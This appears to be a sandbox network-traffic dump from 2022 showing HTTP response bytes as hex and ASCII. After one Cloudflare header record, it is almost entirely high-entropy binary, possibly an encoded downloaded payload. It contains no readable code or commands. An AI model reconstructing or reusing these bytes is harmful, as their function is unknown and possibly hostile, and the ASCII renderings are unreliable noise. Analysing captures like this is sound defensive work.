                                                          2022-02-07 11:04:19 UTC524INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                          2022-02-07 11:04:19 UTC524INData Raw: 42 35 7f ed ef eb ea e9 ec e7 e6 e5 1b 1c e2 e1 a7 5f df dd dc db da d9 98 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 c6 c5 c4 c3 c2 c1 3f 3f bf bd bc bb ba b9 b8 b7 b6 b5 34 b3 b2 b1 41 30 15 a3 ac 1f a3 64 89 1f a7 e9 69 82 f6 c9 36 6c bf ed ee f4 fd eb f9 fa b6 f6 f5 fd fc fe 1b 2f ed e8 ac f9 ff e7 a8 ee e8 a5 c0 cc d1 a1 12 90 1b 18 52 76 77 73 5c 77 76 75 74 73 72 71 df aa 6f 6d 20 6a 69 69 05 dc ea 9b 64 63 62 61 9f df 5f 5d bc 5b 58 78 53 56 06 55 54 ff 50 51 af c9 4f 4d 4c 4b 4a 49 46 8c 44 45 44 63 42 41 bf 5f 3d 3d 3c 3b 3a 29 38 17 36 35 34 31 32 31 cb af 2f 2d 2c 2b 2a 29 2e 27 26 25 24 23 22 21 df bf 1c 1d 1c 19 1a 19 18 17 16 15 17 13 72 94 ef 8f 1f 0d 0c 1b 0a 09 08 07 16 05 04 13 02 01 ff 7f ff fd ec fb fa f9 f8 f7 f6 f5 f4 f3 f2
                                                          Data Ascii: B5_/O??4A0di6l/Rvws\wvutsrqom jiidcba_][XxSVUTPQOMLKJIFDEDcBA_==<;:)8654121/-,+*).'&%$#"!r
                                                          2022-02-07 11:04:19 UTC526INData Raw: 68 31 5e 41 00 1b cd 40 c3 4e 82 a5 5c 59 24 79 91 e2 60 e3 92 51 47 eb a8 54 c3 6f a8 29 a5 61 78 fb e1 0f f1 d0 4e 10 f6 14 9c d4 17 fa 43 3b bb 39 d1 d1 79 ff 7c f6 81 c9 52 7d b6 8b 3d ad b7 40 5a 90 1d ab c6 69 95 02 21 9e e1 b3 af 82 1a ee 09 e1 39 8a ae 20 39 59 47 23 73 97 11 0c db e3 1a bd a0 77 38 8a e2 ee 2a 64 20 ad dd 04 de 93 a8 08 d9 d6 6f 8e c1 89 12 3d f6 cb 7d ed f7 00 1a d0 5d eb 86 29 d5 42 61 de a1 f3 ef c2 5a ae 49 a1 79 ca ee 60 f9 99 87 e3 b3 57 d1 cc 1b 23 da 7d 60 b7 f8 4a 22 2e ea a4 e0 6d 1d c4 1e 53 68 c8 19 16 af 4e 75 e4 da c7 9d 89 d4 9f 9c c7 dc f3 93 d1 d3 11 42 02 62 c0 b8 1c f1 bb 7a 0b 22 c1 40 2e 8c ef 12 73 d3 77 c4 70 03 02 de 86 a0 82 0f 3d 87 59 94 97 ab b4 cc 65 8f 24 a9 a6 ac 71 14 97 d2 6c 4e d1 d7 58 a1 2e 02
                                                          Data Ascii: h1^A@N\Y$y`QGTo)axNC;9y|R}=@Zi!9 9YG#sw8*d o=}])BaZIy`W#}`J".mShNuBbz"@.swp=Ye$qlNX.
                                                          2022-02-07 11:04:19 UTC527INData Raw: 5d 9f 7c d9 e2 60 67 1c c1 27 ef f7 51 05 cf 60 d8 3c 1f 71 8e 9a 5e 54 04 8e 49 82 21 cf ca b7 8b d7 de 6b 03 43 22 05 3a 37 dd a8 56 2f 39 33 8c ea b0 40 96 e5 71 13 b9 67 fc a9 3f 09 c1 a2 3d a1 43 f7 60 54 8c d5 66 78 6c 18 4a 6b b5 cf fb 4c 38 ba 07 12 e7 c3 57 b6 e6 cc a6 2a 27 97 44 bc 07 3a ea 8e 9b 67 b7 d3 4b b5 17 b1 e0 e6 a6 1b e7 e3 67 cd e6 4e 43 95 97 2b 58 ec b3 79 2d d9 83 0d 2b 8e 2e 6d fd 9e fa 4c 65 70 b9 f6 be b6 1e 0c 0d 5d 1d a5 96 65 1f 41 8f ad 58 a5 8e 15 eb fd ba 06 b9 1d b3 e7 dd c5 8d 9e 4f a3 08 55 ed 81 02 ff 7c d6 0b e1 3c b7 42 0c 15 40 c8 d5 bf b6 10 9d 6b fa 9f 4b 4a e5 18 a3 54 bd 43 7f 60 d9 09 12 46 b3 87 cd 8d a3 16 a4 37 90 57 0b 91 be 81 b4 e2 41 e0 8a c8 d1 5d ce 4f ba d9 59 e2 b8 1d 7f d8 f3 2e 77 82 62 bb 83 06
                                                          Data Ascii: ]|`g'Q`<q^TI!kC":7V/93@qg?=C`TfxlJkL8W*'D:gKgNC+Xy-+.mLep]eAXOU|<B@kKJTC`F7WA]OY.wb
                                                          2022-02-07 11:04:19 UTC529INData Raw: f9 26 29 09 ca 64 e1 1a 8d 31 4e dd a5 f7 72 ce ed e8 06 5d 54 a0 2f 6f 94 63 9f 9e d5 bd 1b 96 0b 1c 11 5b 18 50 7f 34 94 67 25 d3 aa ac 34 45 72 ec 6e 2e a6 f7 c1 8e af 7f 47 dd bb 9a 62 9b d6 4c 02 1a da d9 f4 b4 f2 71 09 de eb a8 12 dc 54 74 dc 74 79 c7 f8 ef d6 9e 49 ba 6f 70 9d b4 8c 76 8d ad 45 95 2c 87 75 76 fe 33 65 5e bd 57 3b 98 94 57 82 9f 6c 0d e0 53 f2 96 47 78 77 d5 75 8f 0a b8 a9 3e 75 9d dd 30 b1 28 64 b5 5c 9d 2b e9 0b b5 17 a5 d6 9f 99 6d 10 ab 5a 1c f1 45 e1 1b b0 8e 8a 6d 34 c3 45 64 d3 47 02 16 a1 e4 8a 3e af 92 95 92 f0 d0 df 6c e5 d9 c2 67 e6 bf 65 39 cd 0f ce 35 3a fa 0d 04 4a 49 28 da 0c d7 0b 57 58 bf 45 28 37 d1 43 4b 3d 59 f3 87 e3 f3 07 b5 d2 10 ce 6e 31 b4 9b 5d 48 c9 69 e7 06 6c 7f 6e 93 b4 e6 81 ba 63 c2 b7 86 f4 d9 d5 2d
                                                          Data Ascii: &)d1Nr]T/oc[P4g%4Ern.GbLqTttyIopvE,uv3e^W;WlSGxwu>u0(d\+mZEm4EdG>lge95:JI(WXE(7CK=Yn1]Hilnc-
                                                          2022-02-07 11:04:19 UTC530INData Raw: 2c 04 7e d8 4e 9e 94 d7 39 fd a6 59 bb 66 25 76 f5 d4 7f 16 d7 82 1f e6 83 fb 90 46 de de c7 e0 ec a2 f4 f8 a4 9b c3 15 8e d0 33 48 eb ca 7c 57 f0 3f 55 37 87 82 c2 30 5c cb dd 7e d2 b7 6f 7e d3 4d 3e 88 0a 71 74 0b 5e bb 4c bd 8d 62 a3 11 38 3c fe 64 60 7d e0 56 ab cc 61 5a bf a5 e4 79 ed 04 1b 18 2c ac b6 66 5d 17 96 bb 8e 99 b9 bb b6 69 94 73 a5 9b 22 5a 82 1e 2b 62 41 75 5d 99 c2 de 4c d4 12 3b 30 7c a7 ca 1d 0d 4b 65 7a 72 f8 22 e3 b9 9c 45 f7 cd b7 1b b1 ff 4f f4 e2 1e cb a2 1e a9 fe 33 b7 56 5a 4a 4d 15 fd 38 76 a3 8d 4b e9 09 a7 77 79 0b 44 c4 f8 61 23 da 06 b8 ae 24 90 68 fa 8b d1 78 fe 46 80 bc e2 86 2a e5 20 00 fa d7 fb 80 57 92 54 45 af bf cc 37 0d 09 51 a9 ca 20 cb 2c 8a 6c fa 47 0a e3 49 45 d6 f8 54 66 c3 51 dc 61 ba ba da 89 77 9d 41 69 f8
                                                          Data Ascii: ,~N9Yf%vF3H|W?U70\~o~M>qt^Lb8<d`}VaZy,f]is"Z+bAu]L;0|Kezr"EO3VZJM8vKwyDa#$hxF* WTE7Q ,lGIETfQawAi
                                                          2022-02-07 11:04:19 UTC531INData Raw: 1d ad 2c 45 a6 73 32 53 64 21 79 f2 da b7 2b 25 a8 4e de 7c e6 c3 53 f1 30 3e 7e 78 40 58 2f c4 f2 be f0 e0 ab cf 67 ed 28 d8 6b 21 75 a0 d4 2f eb 6a 01 a0 95 de d8 18 32 65 5d c9 34 5c 6c 86 cf b3 3b 9e e5 8b ad 83 b7 02 7f b9 48 83 9a 86 0d ec 86 d5 f4 02 dd 31 2b 51 51 11 38 b1 ab d8 48 83 e9 65 d4 80 7f 12 44 7a 3d 5e 74 34 92 1f 70 33 3b 4b 54 81 d9 d5 16 df b6 a1 69 96 5f 1d 50 80 c1 c2 5a 3b 75 6b 2b 04 d5 54 3d 95 6d 63 e3 f3 4a c8 d3 58 11 84 23 e5 5b 9c 06 09 c7 3d eb f3 09 bf 79 10 e5 f9 22 34 b2 a0 d4 d8 05 40 50 cb a2 46 76 bd 88 f5 0b bd f5 d5 d8 dd 10 ea f4 ef d9 1e 66 60 ef b2 1c 39 6c 95 ba 54 9b 47 b7 7c b1 40 b9 3c 9c e1 c5 7b cb 8a 21 63 33 8a 9e 57 68 f6 9a bd ab 19 7f a7 b6 31 32 6c 80 7f 0a 56 92 c7 57 d3 7d 42 f1 87 5a 1c 22 01 38
                                                          Data Ascii: ,Es2Sd!y+%N|S0>~x@X/g(k!u/j2e]4\l;H1+QQ8HeDz=^t4p3;KTi_PZ;uk+T=mcJX#[=y"4@PFvf`9lTG|@<{!c3Wh12lVW}BZ"8
                                                          2022-02-07 11:04:19 UTC533INData Raw: fd a1 31 3a a8 52 ca 86 61 dd 8a c5 6a 6d 8c 77 0f 51 ae 77 83 12 92 ac 76 40 04 d3 9e 0e 20 30 ab c9 09 c4 df ce 8d c8 2c 7f d3 3b a3 53 97 ac 76 26 5f a5 f0 c9 35 8b 75 23 fa 7a 5e 48 c5 b4 a5 35 1e 93 f6 30 2d 25 f0 37 7d 37 83 7c b8 16 c4 8e 21 26 2c 08 a0 c3 0a ff 4b 1d cf 55 40 20 02 96 6f ef ad 71 40 91 3e 67 fc 58 bc 06 de b2 52 de 29 71 59 65 a7 8c 19 c8 e4 6c a6 87 31 b4 ab 41 fd 20 d0 aa c9 89 6e ef 56 0d 58 5e 70 11 02 c9 df 5c 3a 2a f7 cd 33 8f 6b 33 10 60 25 b9 8a b2 dc 65 81 0b 9b ac d8 38 d4 7b 56 00 1b d3 c6 50 ec a1 53 8f 4a 2a 4f bf 33 0f 27 0c 7a 16 cf 8e 11 a7 89 6b c6 ea 5a 21 c7 45 a4 d3 b4 6a b1 98 9c 37 0b 67 ec 85 6a a7 ee 7d de 5e 8c 23 a8 4a b6 08 0a d0 bb d9 c1 4b 42 6f e0 84 9b 53 0e e9 09 ea 39 56 78 5d fd ce 97 b0 c7 07 95
                                                          Data Ascii: 1:RajmwQwv@ 0,;Sv&_5u#z^H50-%7}7|!&,KU@ oq@>gXR)qYel1A nVX^p\:*3k3`%e8{VPSJ*O3'zkZ!Ej7gj}^#JKBoS9Vx]
                                                          2022-02-07 11:04:19 UTC534INData Raw: 7a d3 b8 1a 7e f2 82 22 e6 ba d2 e9 ab fb 43 d7 f2 2e 90 28 1e 60 a6 58 99 f5 a6 14 a8 6d 4f 7a 67 b4 97 74 c6 33 9a 38 49 3a a9 5f f5 17 c7 39 a9 c0 66 3d 35 7a 64 81 36 84 2b 78 d3 16 79 1c 47 58 e9 42 84 6f 72 9a 70 cb 64 00 76 57 16 cb b4 1b ab e1 c8 92 54 bd f3 48 af be ce ab 5f 57 21 c2 4c d9 3f 95 63 e3 25 1a 55 8c 1d f2 b1 fc e4 fa 16 d1 5c 9f 57 b8 bf f6 ea f2 46 cb 03 c2 f1 e8 72 c3 39 4e ff fb 1e 0f 0d ba f3 f2 37 be b9 dc c8 d4 32 8f f5 0f b2 6c f4 b4 c7 42 d3 4f 2c 68 58 18 bd d0 c0 31 23 9f 1e 10 61 3c 28 7b 1a d1 e7 85 21 6b 14 65 4a 07 56 3a c1 97 c2 65 99 8e be 95 91 da 29 d7 89 61 70 a3 0a cb 65 49 2d c8 ff 34 56 8a b3 e5 89 0f 34 a1 88 cc c9 28 65 66 e0 90 9e 19 74 fa d8 3a b5 f4 27 fb 76 2e 05 94 bc 14 d0 ed 7a 08 82 d7 24 cd 7a d7 bd
                                                          Data Ascii: z~"C.(`XmOzgt38I:_9f=5zd6+xyGXBorpdvWTH_W!L?c%U\WFr9N72lBO,hX1#a<({!keJV:e)apeI-4V4(eft:'v.z$z
                                                          2022-02-07 11:04:19 UTC535INData Raw: 36 e0 2a 18 ef 44 50 29 ac ae ec 22 0a 82 35 f4 a4 d0 57 1d 72 13 ce 47 d2 9d 38 4d 01 94 93 07 a3 8a 9a 0a 0d b4 f3 34 9b 95 b3 78 fe 73 b8 fe 4f 1c f3 2e 52 64 c7 35 03 be 3d 2a ed ce a4 8f 5e da 51 c5 58 7e 52 91 ae a5 a0 70 e5 4b 66 94 bf 69 7c 4c de 84 82 ee 24 cd ea 90 f2 87 aa f4 31 fd 78 e1 d9 46 f8 6b 51 a6 bf 60 09 ff a1 d9 3f 28 7b 4e 14 45 41 e5 24 5d 39 94 b9 5b 71 c0 34 e5 12 8b 5d 67 58 e6 eb 7d b1 96 57 44 06 4d c4 d2 7c cc f1 78 e0 07 82 34 47 b6 1a 7b 5f 92 e5 14 20 52 39 ef b6 90 84 33 64 fc f8 ef 3e b0 e8 7d 62 46 7a c7 23 25 6a 09 d9 0a b6 d6 8a 0d 76 ee e9 f7 5d 9f 3c 48 5e 25 1c 2e 0b cb 80 00 28 8f 74 01 e9 ff 5b 7a ed de f0 85 32 88 d1 e5 cc 93 df af 59 9d 47 8c 97 2f 39 c8 ed a6 fc 98 c4 8d 00 17 7b b2 72 b5 dc fe a4 0c 9d 9d 0b
                                                          Data Ascii: 6*DP)"5WrG8M4xsO.Rd5=*^QX~RpKfi|L$1xFkQ`?({NEA$]9[q4]gX}WDM|x4G{_ R93d>}bFz#%jv]<H^%.(t[z2YG/9{r
                                                          2022-02-07 11:04:19 UTC537INData Raw: b8 18 2d 3e b5 c6 9f 99 0b 08 93 d2 67 98 e0 fe 4d 54 9f ce 19 3e a2 f4 75 b6 3b 24 52 59 19 ff 4b aa 83 31 e1 f8 7e d2 c1 f0 07 00 88 69 aa b5 23 8c e7 ca b1 70 18 0e fd c2 fe 52 93 11 ee 34 dd 50 3f b4 13 55 b2 56 36 36 40 e6 62 71 9a e1 97 e1 63 2d 62 a2 2a 52 b7 fa 2e 84 ef 37 9f 2c d9 01 c2 2b 19 87 cf 6b 60 07 7e fa 0c 45 f5 3c cb 44 d7 61 fe 15 ea 9f 0a b8 79 a0 85 cb 39 90 d9 ac e5 89 87 6e 78 41 5f 2f c2 98 76 7c 7a e6 93 d1 60 d3 0b 82 07 f9 b8 23 a2 c7 d1 21 28 68 0c 77 a5 e7 fb cd 49 2e 64 22 36 19 46 d4 e3 7e 57 aa 4d f0 7f 1f e6 4b 47 3e 50 17 c3 05 88 4d cf 31 18 47 2f ea 17 7e 44 6c 76 63 2c ed 70 2a c4 a8 e8 bd ce 87 c7 dc a8 8c 76 97 46 94 c1 8a 87 00 b9 66 a0 12 25 33 b0 76 4f c9 0e 12 db 8e 53 9e 66 24 b5 40 fd c1 c3 6b f5 32 33 b7 e4
                                                          Data Ascii: ->gMT>u;$RYK1~i#pR4P?UV66@bqc-b*R.7,+k`~E<Day9nxA_/v|z`#!(hwI.d"6F~WMKG>PM1G/~Dlvc,p*vFf%3vOSf$@k23
                                                          2022-02-07 11:04:19 UTC538INData Raw: 63 92 5e a3 43 f7 70 a7 06 7f e2 47 35 aa 90 6f 93 c7 1b a3 75 db d9 4f 11 71 6f ab 23 24 70 3b a1 ff 47 6f 5a c7 30 70 f6 8a 3c 99 ba bf 59 ba 2c e7 5c 25 a5 b9 3e 23 16 5c 39 c1 21 7f bb 46 8b 26 36 ce 68 4b 5d 3e bd 8e 44 63 ad 9d 09 ee 7f 8c 9b 14 2e a2 73 d3 2c 28 e9 c0 0f e3 38 04 70 ef 1b 91 8f 8d 35 d2 27 21 da c5 23 ad a7 0e de 79 11 6c d7 0b 45 02 c8 99 ef 11 d5 74 5f 27 a5 82 07 dc 55 8c 6b 57 c4 75 e2 65 99 81 63 26 f5 0b 2b ef 2c f9 78 b6 6b fd 58 f8 b9 ea 22 8d 14 ab d0 29 89 f1 bd 41 a5 5e ad bd 3f e7 5d 12 e8 28 60 75 5e d0 07 ff f7 20 42 01 e3 e2 84 18 07 82 6a 18 83 32 3e 56 27 86 2d b4 a0 b2 b0 ac 09 82 df 56 4b 51 64 bf 20 38 5d e6 81 42 52 e0 2c a6 76 1f 59 3e c1 65 e3 9f 02 7e 68 61 3f 1e dc 98 0f 35 eb 1a ad bb 83 a8 89 d9 f3 a4 f7
                                                          Data Ascii: c^CpG5ouOqo#$p;GoZ0p<Y,\%>#\9!F&6hK]>Dc.s,(8p5'!#ylEt_'UkWuec&+,xkX")A^?](`u^ Bj2>V'-VKQd 8]BR,vY>e~ha?5
                                                          2022-02-07 11:04:19 UTC539INData Raw: bb f4 66 c3 cf ca d2 e2 f0 a2 0a 22 ac 8a 69 cb a3 cf 71 56 63 f3 98 6d ef 97 c6 32 1b 40 f8 2b f4 de 1c 36 ed 85 be fb d4 26 39 cc e5 12 7c 56 19 1e 95 42 8f 07 00 69 cd a2 99 25 23 78 22 7b bf 49 2b 7a 18 d3 15 89 f4 1d c1 db 5e a4 b5 b9 3f 7a 33 a4 bf ab a6 d7 bf ba a6 d0 22 92 2c f7 a8 a8 b7 94 9d a7 e3 76 8d 9e 2b cd d6 90 5c 85 bb 46 0d f1 8e ee ef 09 ac c1 8a ba ae bf 52 2a 55 97 6f 11 fb 7b c1 99 ca bb b2 2f 0a bd 68 04 89 bd 84 c1 61 59 c6 d6 c9 af 0d c5 b8 46 3f 6e c3 c0 29 44 c7 2f bd 9d 4d d3 8e 0c 38 9c 9c d3 0e 83 bc 77 e1 da b9 b7 13 55 91 ba 19 64 9f 16 ec ac c0 40 d0 01 d4 cc 74 73 aa 46 f7 9b ba f8 f7 d6 b0 2d 71 87 7f 79 dd c7 eb 30 b2 8a b6 b4 42 f5 45 87 79 4f 57 b7 cb 39 39 46 85 0e 17 21 1f 68 12 69 78 63 3c 10 50 be e8 a0 4c 32 d4
                                                          Data Ascii: f"iqVcm2@+6&9|VBi%#x"{I+z^?z3",v+\FR*Uo{/haYF?n)D/M8wUd@tsF-qy0BEyOW99F!hixc<PL2
                                                          2022-02-07 11:04:19 UTC541INData Raw: 14 eb c2 c9 26 74 05 7b 5b 9c e2 04 c4 20 c2 25 2d 0c ae 9b 3b 8e 3a e8 ac 5e 1b f9 07 d1 d1 37 a4 d9 98 e3 42 d1 21 a3 e6 9d 85 9d e6 4b bf e1 34 33 a6 86 67 d3 ff ae bf e5 80 b7 84 2d c6 ee e8 28 b8 c0 c2 e8 aa ad 55 34 15 75 ea 1a 01 ce 0a 45 8b f1 1d 83 8f bb f7 b2 17 dd 91 d1 cc b5 c6 61 2a fb a3 4c 0d 0f dc 41 01 65 37 00 66 b5 a3 21 c2 fb 6d 9e ed 2f 82 c5 44 b8 78 f1 34 77 86 30 a1 7a 6d fe 55 97 c8 02 76 47 d7 7f 2e 58 2c 12 a8 37 6a 3b ad c2 6c d2 a5 ad 2c 47 25 1a 55 5c 75 09 89 35 bd db f8 82 13 87 f5 66 6d 60 82 f3 cc ce 16 f8 11 6c 7a b7 59 b7 c1 9d d7 fd 01 0c 51 2f 7b a3 c9 e6 cc c5 ea d2 0a 9c 35 75 ac 13 8d b7 de a8 e4 16 52 6e b1 b7 41 02 94 84 b9 71 24 cc 4d f8 fb e7 ef 81 db 84 b9 41 b1 9d 96 70 91 ee 80 4d 13 f5 5b fc 6e 1f b8 5b f2
                                                          Data Ascii: &t{[ %-;:^7B!K43g-(U4uEa*LAe7f!m/Dx4w0zmUvG.X,7j;l,G%U\u5fm`lzYQ/{5uRnAq$MApM[n[
                                                          2022-02-07 11:04:19 UTC542INData Raw: 72 19 89 33 e9 97 9f 7c ba 7d 13 44 d9 59 e9 a5 a6 07 5d fd 27 37 28 0e a3 fc 47 5f 12 c4 ea 4b 54 3c 94 18 30 e2 2c 0c 4e d0 02 14 c7 fd 97 7c 15 c8 8d 43 67 b3 6f 02 2c 12 0f 97 9d cc d9 f4 8f bd fd 81 5d b3 bc 30 b9 fc dd d6 02 c4 8d 51 4b e3 53 d3 3b 65 db 2c c6 d3 1e 10 bf 17 78 01 a5 6a 6b f7 04 e7 7c cb 16 70 19 22 02 83 df 20 8a d2 92 b7 a6 5b 04 a8 6c b6 3e 1a 8c 18 5f b4 94 66 87 0c 03 fe 9c 8f ca 68 d3 88 2f 2f a1 02 5e 99 e3 5a ba 83 90 5a c1 f6 0c 59 b8 e2 17 6b 67 05 af d0 95 b0 9a 6d f6 c3 c1 5c 3a ed 2c 03 9b 12 9c 89 44 1d 95 eb 1a 70 66 12 9a 6c 12 68 bb 38 97 b1 86 49 26 11 4b eb d7 b6 06 5c 7a 9a c7 7e 12 90 5d df 7e 9a e2 af c8 22 ca 30 26 df 6c ee 24 bb 60 79 b8 6f ce aa 61 b3 4b c3 38 14 72 3c 16 ea 71 eb 8d b4 9c 18 ff 1e 98 5c e5
                                                          Data Ascii: r3|}DY]'7(G_KT<0,N|Cgo,]0QKS;e,xjk|p" [l>_fh//^ZZYkgm\:,Dpflh8I&K\z~]~"0&l$`yoaK8r<q\
                                                          2022-02-07 11:04:19 UTC543INData Raw: 36 12 7a b8 db 14 1e db c0 9f 93 c9 79 da 79 0c f0 0b 06 17 00 29 09 ee 28 8f cb 30 49 36 1b 3f 5a 9d fa e7 3c 00 e7 3d b7 1c 57 02 72 2d 7f 25 8c 5b 2c 51 07 f5 74 4a 8d 74 6f 16 7c b2 57 c9 ef e1 fd 3b 43 37 46 76 a3 7a 38 44 ae fb 84 3d 0c 07 19 25 b6 fa 03 83 37 8e 8b 9c 3d 16 9f 53 f0 2a b5 95 a2 dc 91 58 0d 4d fe bd 9a 3e a6 cf 11 af 0c f1 27 a4 45 d9 af 89 2f 82 d0 cd 71 42 0f 42 18 27 1c fe f3 f3 22 17 96 77 11 58 39 36 35 20 d6 b6 51 f1 34 29 87 2f af 63 8c 09 99 3a 49 00 60 90 25 c9 83 33 e7 cd f3 bf 18 fe bf 72 0e ad bb 90 a4 a5 c0 68 75 f9 fe df f0 30 4e d4 1f 17 b2 45 d4 ef 5f eb de f5 9b d9 e8 74 17 83 f6 56 77 32 ca 38 92 31 9a 6f a6 98 3e b8 05 91 45 f0 33 cf ee 77 28 cc e2 27 84 ea d6 7d b6 d7 2c c9 77 40 17 95 96 c8 4c 1c 54 70 da 0a bf
                                                          Data Ascii: 6zyy)(0I6?Z<=Wr-%[,QtJto|W;C7Fvz8D=%7=S*XM>'E/qBB'"wX965 Q4)/c:I`%3rhu0NE_tVw281o>E3w('},w@LTp
                                                          2022-02-07 11:04:19 UTC545INData Raw: 6b 41 70 bd fb b3 bd 9f a8 6c 1b ea 64 75 2d e2 64 7e c2 98 bd 80 f4 7d 91 24 b2 b2 24 bc 97 dc b8 53 b7 64 4d be 1c 92 b9 d5 bb 0c 28 34 93 99 b3 cb 2d f0 c1 38 07 e1 d6 2c b2 2b 94 ec 24 5c a3 72 1c e2 aa 28 3b 8f 20 c3 45 c0 12 82 22 c5 70 e9 80 60 04 41 05 53 e4 51 66 d0 97 ac 61 cb 9c 56 99 7d 24 7c 1d f6 ee 78 c3 8e 81 bf 75 e2 1b 51 cd cc 63 01 cc 77 15 4f 8c 94 bb 19 7f b5 84 b3 52 43 7e 39 ce c0 82 e0 81 a7 f0 75 94 1d 87 a2 71 5c 21 ab 68 b4 df b7 4f c9 68 e3 3a 4d 2c 2f 40 d4 3f cf c4 9f 72 43 1e 89 81 26 f8 94 0d 18 39 06 76 df ff 07 21 aa e3 d9 68 9a 9e 4f 8d 83 63 a7 6d 98 85 51 7c 7c 1a 4d ad a7 e3 a0 41 a4 e4 f4 1e 68 8c 3b f5 ad fd 5e d7 90 c2 29 0c 44 0c d9 08 2d 92 a2 af 4a 17 6b de 11 87 d8 45 6f 44 6a f9 cd 9e cc 65 b7 2c cf 4a 8e fd
                                                          Data Ascii: kApldu-d~}$$SdM(4-8,+$\r(; E"p`ASQfaV}$|xuQcwORC~9uq\!hOh:M,/@?rC&9v!hOcmQ||MAh;^)D-JkEoDje,J
                                                          2022-02-07 11:04:19 UTC546INData Raw: 4d 04 57 28 8e ce 8e ae 79 62 0c 28 74 0a 07 eb 59 31 4f a9 47 51 c4 29 45 da 3d bd fa bc d2 aa 35 38 27 24 a6 65 1b 30 2c b8 98 e3 f7 9d 72 5f 7b 65 ec b0 cf 06 9e 68 9a 21 11 46 fa c1 e1 fe 35 59 89 b2 86 d5 60 06 58 13 88 54 a4 7c 17 82 b0 c3 6a 99 2a 0d 90 ef 0e 86 e3 8c 61 6e c6 9c 27 73 87 df 7a 86 e6 47 b0 06 02 3c d4 c1 50 80 23 a3 61 eb 73 57 14 e7 d5 70 87 27 fe 71 a4 0d 48 17 8c 96 0c a0 85 f3 32 76 dd dd 13 e4 7d c3 5a 4a 6f e7 87 a1 fe a7 37 a8 e0 50 a3 5d a2 14 43 66 48 ea d2 0e f7 b6 f3 02 00 f1 3d 93 0c e1 42 f1 a5 27 76 bf d1 68 23 83 cb 95 d0 54 d1 0c 0e 19 02 02 6f 81 4c a7 1f b1 3f 64 d7 8f 82 89 2a 2a f7 d0 4d d0 45 2a 83 99 30 10 01 04 da 35 00 04 3d e9 b9 b9 21 7e c2 f4 61 13 c1 7d 00 f7 b1 d8 c6 e2 b1 74 a5 98 11 c2 9f 61 17 d7 96
                                                          Data Ascii: MW(yb(tY1OGQ)E=58'$e0,r_{eh!F5Y`XT|j*an'szG<P#asWp'qH2v}ZJo7P]CfH=B'vh#ToL?d**ME*05=!~a}ta
                                                          2022-02-07 11:04:19 UTC547INData Raw: f2 13 fc 8b d4 28 9f 71 2b 4e 13 4a 2c ae b0 68 dc a9 25 12 06 a1 2a aa 90 12 bf 21 11 df 95 9e 02 b8 40 87 95 b6 5f bf d0 ed 8b c2 45 25 d8 f2 8a 55 cb 78 1e e4 9e 64 95 ea 1f ef 79 d0 1b 92 ef c5 68 e9 3a 19 79 ff b9 34 f2 17 85 92 7e 32 92 45 af c1 f7 41 7a 4b 7f 95 51 0a 6a 84 1f 1e d7 fc fa f8 4a 27 c5 66 55 2b 4f 80 bb 9c 61 21 c2 5f 3e 0c 40 f4 04 53 b8 6b c8 7e c4 b1 0e 6a 61 69 12 49 29 92 51 7f 45 67 ca d1 16 f5 e0 0f 3e c5 21 7f 68 0a 58 53 81 80 de a1 87 1d 39 3f cf ab 88 43 1b 45 6e 01 b1 85 ef f8 28 51 2f 04 83 e0 95 56 82 a8 d5 57 85 0b 15 5e ca 92 ee 54 78 53 5a 40 79 2d ca 3e a0 aa 49 0d cb f7 59 c8 d7 35 73 f3 d8 bf 6b 47 02 8f 2f 8c 06 b7 bf bd 2c 5b 99 19 18 63 90 ce 2a b6 d5 5e 5f 90 4a 2e a2 9f b2 6c 95 d5 03 d6 fb 24 27 ca ef c5 75
                                                          Data Ascii: (q+NJ,h%*!@_E%Uxdyh:y4~2EAzKQjJ'fU+Oa!_>@Sk~jaiI)QEg>!hXS9?CEn(Q/VW^TxSZ@y->IY5skG/,[c*^_J.l$'u
                                                          2022-02-07 11:04:19 UTC549INData Raw: b3 93 af c5 93 05 40 19 93 5c db 59 d7 86 ef 70 4b 9a 88 0b 47 ae 51 6f 33 e6 b0 4b 0e fc 5c ed fb 43 2c 8c ab 52 7f 6b 3b dc f4 d8 9a 95 1a 3d 52 38 69 08 b2 73 4c bb 65 80 b8 9f 4b be 25 4b 7c 97 63 c9 0f 64 28 09 47 34 50 08 b1 03 b8 4e 79 d2 9e d6 c3 16 17 b1 f8 01 d6 ed 67 e8 ec 97 ca c0 e0 b5 a6 cd 92 47 4b 2f 96 28 1c 1a e5 60 48 e3 46 b3 1b 9f 1d 33 71 51 e6 aa 0c ba 6f 0f 36 33 a3 56 fa e8 c2 cb 33 4b 20 8d 27 21 c0 26 6b 03 92 e5 f6 63 fc 98 a2 41 59 8d 0d c7 f2 34 1e fe cf 4d 7e df 9a 4a cc ba 8c a3 7f 3a 68 87 48 3f e7 98 57 5b 6d 94 7a 21 c5 76 a6 79 39 54 8a a5 5b 0a 4f e3 75 fc f5 12 02 87 88 4e 4e a6 fb 4d 02 1c 61 bb 9d 22 47 2f 1f fd 65 8d 57 1b 8f 39 18 82 6f 2b aa 48 06 17 ff 33 45 19 a3 eb f5 17 0a 88 d1 c2 f1 44 6f 52 d9 f5 c3 46 d9
                                                          Data Ascii: @\YpKGQo3K\C,Rk;=R8isLeK%K|cd(G4PNygGK/(`HF3qQo63V3K '!&kcAY4M~J:hH?W[mz!vy9T[OuNNMa"G/eW9o+H3EDoRF
